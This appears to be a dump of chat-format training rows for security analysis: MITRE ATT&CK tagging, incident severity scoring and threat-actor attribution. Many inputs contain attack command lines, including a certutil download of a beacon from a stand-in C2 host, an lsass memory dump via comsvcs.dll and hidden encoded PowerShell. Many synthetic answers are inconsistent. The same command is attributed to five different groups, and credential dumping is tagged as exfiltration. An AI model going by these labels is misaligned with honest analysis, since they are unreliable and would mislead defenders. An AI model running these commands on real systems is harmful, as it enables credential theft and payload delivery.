messages
listlengths
2
2
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: DOGCALL can capture microphone data from the victim's machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1123\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor executed commands and arguments for actions that are associated with local account creation, such as net user /add , useradd , and dscl -create", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Lucifer can use the Stratum protocol on port 10001 for communication between the cryptojacking bot and the mining server.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-L1E2M11M7V)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Lateral Movement, Credential Access, Privilege Escalation", "role"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-N51VH9EBNH)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severit...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-WIC20MWR1H)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Defense Evasion, Lateral Movement", "role": "user" }, { "conten...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confi...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-AVZ7HD66W9)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Defense Evasion", "role": "user" }, { "content": "{\"severity\": \"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1178 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.105.188.200", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0003\"], \"techniques\": [...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: RedLeaves can use HTTP over non-standard ports, such as 995, for C2.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1571\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confi...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-HWV3QBIO82)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance, Command and Control, Lateral Movement", "role": "user" ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 604 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.186.8.142", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0006\", \"TA0011\"], \"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-BRY3DHQ1FD)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Collection, Privilege Escalation", "role": "user" }, { ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.134.243.166", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1531\"]}", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Base64, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence\": \"High\...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.48.100.172", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0010\", \"TA0007\"]...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.116.111.168", "role": "user" }, { "content": "{\"tactics\": ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adver...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 1902 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.79.152.229", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1003.00...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-OEDT0BEP7A)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{\"severity\": \"High\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-2QAR0H7DC1)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \"Extrem...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"co...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2337 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidenc...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-6QG0Q0BIKO)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Reconnaissance, Credential Access", "role": "user" }, { "content": "{\"s...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3796 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Lokibot has the ability to discover the domain name of the infected host.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1016\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Base64, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"co...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-BFSML2FDE2)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": \"Ext...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-GSGRK5HCK2)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Execution, Collection, Reconnaissance", "role": "user" }, { "content"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-YM2P030NCV)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Collection, Impact", "role": "user" }, { "content": "{\"severity\": \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2875 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidenc...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.171.84.197", "role": "user" }, { "content": "{\"tactics\": [\"TA...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-CHOCXHDS3O)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation, Discovery", "role": "user" }, { "conten...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-SUDJ5DNQJU)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Discovery, Command and Control, Credential Access", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1572 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", \"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 821 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.11.71.34", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0010\"], \"techniques\": [\"T1...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Watch for access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information reposi...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.183.206.19", "role": "user" }, { "content": "{\"tactics\": [\"TA...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Global LSA secret (G$MSRADIUSCHAPKEY)", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0005\", \"TA0006\"], \"techniques\": [\"T1556\", \"T1556.005\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 1535 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.82.239.62", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\",...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3070 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.80.56.102", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor executed commands and arguments that may gather credentials from information stored in the Proc filesystem or /proc.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2978 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confid...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: HELLOKITTY can enumerate logical drives on a target system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-DNXO6I5D7C)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Impact, Defense Evasion, Reconnaissance", "role": "user" }, { "content": "...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-B8HLWBJ7VY)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-G604TV579G)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Exfiltration", "role": "user" }, { "content": "{\"severity...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-ZW4KVTT022)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation, Defense Evasion", "role": "user" }, { "con...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-J65HNG4ELM)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Collection, Defense Evasion, Credential Access", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-0IWI0YE7L3)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Initial Access", "role": "user" }, { "content": "{\"severity\": \...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-H1NDHH8N37)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severi...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: collect + keychain in same sentence", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1555.001\", \"T1555\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-482C2BJFQ8)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severity\": \"Ex...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.155.128.234", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0008\"]...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3124 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence\"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Turn off or restrict access to unneeded VB components.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.005\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1580 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: lists the running processes", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-1UQN1TMMUQ)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Lateral Movement, Initial Access, Credential Access", "role": "user" ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-QBWZEGBJ27)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Initial Access", "role": "user" }, { "content": "{\"severity\...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.39.192.232", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0010\"], \"techniques\": [\"T107...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.94.242.204", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0004\"], \"t...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: WindTail can use the open command to execute an application.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.004\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: VERMIN can get a list of the processes and running tasks on the system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-SFNY8BV53Y)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Command and Control, Initial Access, Discovery", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-280KJXDDZ4)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\"severity\": \"H...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: RTM can delete all files created during its execution.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: SombRAT can execute getinfo to identify the username on a compromised host.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1033\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-2JYTNJN1N3)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Persistence, Initial Access, Lateral Movement", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-BQNQB7H2G4)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \"High\", \"bu...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.20.8.146", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA000...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Zox has the ability to use SMB for communication.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021\", \"T1021.002\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Static key hardcoded in the Remote Access Subauthentication DLL (RASSFM.DLL)", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0005\", \"TA0006\"], \"techniques\": [\"T1556\", \"T1556.005\"]}", "role": "a...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"Scattered Sp...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: RunningRAT uses a batch file to kill a security program task and then attempts to remove itself.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}",...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.179.146.57", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T107...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-97WQMG0K5V)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Collection", "role": "user" }, { "content": "{\"severity\": \"Critical\...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: CHOPSTICK encrypts C2 communications with RC4.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.001\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.84.192.216", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-KS6E2VWXO8)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Credential Access, Exfiltration", "role": "user" }, { "content"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 1943 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.121.234.232", "role": "user" }, { "content": "{\"tactics\": [\"TA...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-CQ78QP6CRV)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Credential Access", "role": "user" }, { "...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-TA24LU3S00)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Initial Access, Credential Access", "role": "user" }, ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, WMI, Base64", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confiden...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-1E6KXQD04B)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Defense Evasion", "role": "user" }, { "content": "{\"severity\": \"Ext...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.137.46.178", "role": "user" }, { "content": "{\"tactics\": [\...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: EnvyScout has been executed through malicious files attached to e-mails.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1204.002\", \"T1204\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3554 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"con...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.65.239.73", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0006\", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-R3I24P0JC1)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Collection, Execution, Lateral Movement", "role": "user" }, { ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.114.77.38", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0007...